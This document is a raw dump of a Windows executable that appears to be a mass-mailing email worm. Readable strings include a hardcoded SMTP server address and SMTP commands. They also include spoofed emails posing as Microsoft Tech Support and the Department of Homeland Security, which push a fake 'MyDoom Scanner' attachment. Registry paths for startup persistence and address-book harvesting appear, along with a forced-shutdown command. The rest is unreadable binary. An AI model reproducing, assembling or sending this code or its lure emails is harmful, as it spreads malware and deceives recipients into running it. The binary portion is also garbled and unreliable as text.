MZP               @                                      	!L!This program must be run under Win32
$7                                                                                                                                        PE  L 0/r         Z                 0    @               
      p                                         P  X                           `                                                                                     CODE                                `DATA         0                    @  .idata      P                    @  .reloc      `                     @  P                                                                                                                                                                                                                                                                                                                                                                        h   hB@ ~  hB@   h@@ h?@ 6  uQ5  @@@ 8.EXEt@  j h?@ 5@@   h?@ h
@@ h@@    jh?@ h@@ j   jh?@ h=@@ j   jh@@ h@@ h@@ h@@ j    h   hB@    B@ G? u?@ \G   h@ hB@ jh?@    j W   % Q@ %$Q@ %(Q@ %,Q@ %0Q@ %4Q@ %8Q@ %<Q@ %@Q@ %DQ@ %HQ@ %LQ@ %PQ@ %TQ@ %XQ@ %\Q@ %`Q@ %dQ@ %hQ@ %lQ@ %pQ@ %tQ@ %|Q@ %Q@ %Q@ %Q@ %Q@ %Q@ %Q@ %Q@ %Q@ %Q@ %Q@ %Q@ %Q@ %Q@ %Q@                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                211.72.144.51                                                                                                                    helo support
"   mail from: techsupport@microsoft.com
	   rcpt to:    data
   helo admin
   mail from: 211.72.144.51:25
  From: "Microsoft Tech Support" <techsupport@microsoft.com>
Subject:Microsoft Tech Support Critical Alert
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="----=_NextPart_000_0005_01BDE2EC.8B286C00"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
------=_NextPart_000_0005_01BDE2EC.8B286C00
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

During the last month, many bugs were found in our software.  Because
want to give our custumers as much security as we at Mircosoft always have
we will as always remain doing so dillegently, such is our ultimate ongoing goal to you
our customers and shall remain so in order to live up to our trademark of excellence.
As such,  we decided to send out to all known Microsoft custumers this
fast and efficient MyDoom Scanner Version 1.0 Build G created by the Microsoft
Tech Support Team.  This this scanner/cleaner should detect and clean automatically
all know forms of the MyDoom worm versions A through G and will be updated
Watch for future updates and patches of this fine utility and as always check for Updates
and least once a month or more (also see future mailing from Microsoft Tech Reps.)
as always thank you for being one of our valued customers in the Microsoft family !
The scanner is completely free and easy to install.
After a successful installation you should get an OK message box.
Thank you again for using Microsoft products.


Care of Your Microsoft Tech Support Team

------=_NextPart_000_0005_01BDE2EC.8B286C00
Content-Type: application/octet-stream; name=mydoomscan1g.EXE
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="mydoomscan1g.EXE"

p  From: "Dept. of Homeland Security" <dept_homeland@dhs.gov>
Subject: Notice: Dept. of Homeland Security Internet Worm Warning/Prevention 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="----=_NextPart_000_0005_01BDE2EC.8B286C00"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
------=_NextPart_000_0005_01BDE2EC.8B286C00
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

                              
                              
                              

Glad to serve u, master
	   --123--
   .
   quit
                Software\Microsoft\Internet Account Manager Software\Microsoft\Windows\CurrentVersion\Run Software\Microsoft\WAB\WAB4\Wab File Name         Software\Microsoft\Internet Account Manager\Accounts\00000000 Default Mail Account SMTP Server POP3 Server POP3 User Name SMTP Email Address 	      P                                                                                                                 250                                                                                                                                                                                                            lord_yogsothoth@yahoo.com         InternetGetConnectedState wininet.dll     mydoomscan1g.EXE Couldn't execute frame buffer! KERNEL32 ERROR                                                               mydoomscan1g.EXE W32.IdiotTest by -=[Azag-TH0TH]=--=[Azag-TH0TH]=- Win 32Bit MyDoom Scanner v1.0 Build G by -=[Azag-TH0TH]=- MyDoomScan1G.EXE     load windows LOADING TEST For MyDoom Scanner v1d.. Test will now begin scanning-cleaning your computer hard drives...................... C:\WINXP\system32\shutdown.exe open -s -t 95 \   wininit.ini Created by -=[Azag-TH0TH]=-                                                                                                                                                                                                                                                                                     xP          Q   Q  P          Q  |Q  P          Q  Q  P          Q  Q  Q          Q  Q                      R  R  (R  FR  TR  bR  zR  R  R  R  R  R  R  R   S  S  &S  8S  FS  VS  fS  ~S      S      S      S  S  S  S  S  S  S  T  T      T  (T  :T  JT      R  R  (R  FR  TR  bR  zR  R  R  R  R  R  R  R   S  S  &S  8S  FS  VS  fS  ~S      S      S      S  S  S  S  S  S  S  T  T      T  (T  :T  JT      KERNEL32.dll USER32.dll SHELL32.DLL WSOCK32.dll ADVAPI32.dll    WriteFile   WriteProfileStringA   WritePrivateProfileStringA    CloseHandle   GlobalAlloc   GetCurrentDirectoryA    CreateFileMappingA    GetModuleFileNameA    FindFirstFileA    FreeLibrary   GetCommandLineA   CopyFileA   CreateFileA   GetFileSize   ExitProcess   GetWindowsDirectoryA    GetProcAddress    GlobalFree    LoadLibraryA    MapViewOfFile   SetCurrentDirectoryA    UnmapViewOfFile   MessageBoxA   ShellExecuteA   connect   closesocket   WSAStartup    WSACleanup    socket    gethostbyname   send    recv    htons   RegQueryValueExA    RegSetValueExA    RegOpenKeyExA   RegCloseKey                                                                                                                                                                                                                                                                                                                                                                                                                                               000%0@0^0e0q0w0}00000000000011 171=1C1I1O1U1[1a1g1m1s1y111111111111111111111112	22                                                                                                                                                                                                                                                                                                                                                                                              